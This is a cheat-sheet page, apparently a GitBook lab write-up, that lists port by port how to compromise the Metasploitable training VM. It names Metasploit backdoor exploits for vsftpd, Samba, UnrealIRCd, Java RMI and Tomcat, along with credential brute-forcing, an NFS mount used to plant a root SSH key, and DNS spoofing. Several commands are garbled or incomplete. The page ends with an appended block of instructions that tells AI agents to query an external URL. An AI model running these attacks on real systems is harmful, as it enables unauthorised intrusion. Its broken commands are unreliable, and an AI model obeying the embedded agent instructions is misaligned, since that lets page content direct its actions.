# Metasploitable OS Complete Solved
#### Port 21 & 2121
```
# Searching the ftp version
auxiliary/scanner/ftp/ftp_version
# Exploiting 2.3.4 Backdoor
exploit/unix/ftp/vsftpd_234_backdoor
### Port 2121
systemctl postgresql start
auxiliary/scanner/ftp/ftp_login
> ftp 2121
```
#### Port 22
```
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login
```
#### Port 23 & 1524
```
auxiliary/scanner/telnet/telnet_login
### Need to use Wireshark to inspect login credentials
ncat 1524
```
#### Port 25
```
# SMTP
auxiliary/scanner/smtp/smtp_enum
## Veryfying the users available on the internet
nc 25(port SMTP)
VRFY
```
#### Port 53 ISC BIND (DNS)
Port 53 is **used by DNS (Domain Name System)**.*Berkeley Internet Name Domain* DNS takes care of recolving human readable 'host names' into numeric IP addresses. A commonly used DNS server called BIND has had a rich history of security problems. As a result, BIND and port 53 are frequent targets and a couple worms used BIND exploits to propagate.
```
https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain
```
#### Apache HTTPd 80
* It is used to host the DVWA on the metasploitable OS but it also can be exploited.
```
nbtscan -r IPrange/24
dirb
http:///phpinfo.php
msf6> auxiliary/scanner/http/http_version
cadaver /dav/
# A Linux terminal should pop-up
```
#### PORT 111/ 2049 RPC Bind
RPC - Remote Procedure Calls NFS - Network File system
```
rpc info -p
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs :/ /mnt
### Listing the filesystems
df -k
cd /mnt/root/.ssh
cp /root/.ssh /mnt/root/.ssh
### To make ssh connection we need to extract the ssh authorized
key pair into the known authorized file
cat >> authorized_keys
ssh -i /root/.ssh/ root@
```
#### Port 5900 VNC Viewer
```
auxiliary/scanner/vnc/vnc_login
vncviewer
```
#### Port 139-445 NetBIOS SSN
```
auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script
```
#### Port 512 513 514
* These ports are also known as the remote login r services which is able to log in the systems using TCP Wrapper network access protocol
```
sudo apt install rsh-client
rlogin -l root
```
#### Port 1099 Java RMI server
```
auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server
```
#### Port 3306
```
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
# On bruteforcing we get the password
mysql -u -h
### Some Mysql Commands
show databases;
use ;
show tables;
describe ; (Select query)
```
#### Port 5432 Postgres
```
auxiliary/scanner/postgres/postgres_login
psql -h -u
```
#### Port 6667 Internal Relay Chat (IRC)
```
service postgresql start (IRC Requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding
Show playload
set payload to ruby
```
#### Port 8180 (Unknown)
* Port 8180 is used by the Apache tomcat service to run the java codes on the go....
```
Default password list github for apache tomcat based logins
exploit/multi/http/tomcat_mgr_upload
```
***
\~ Ghoul
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ghoulsec.gitbook.io/ghoulsec-vault/server-are-fun/hacking-systems/linux-systems/metasploitable-os-complete-solved.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.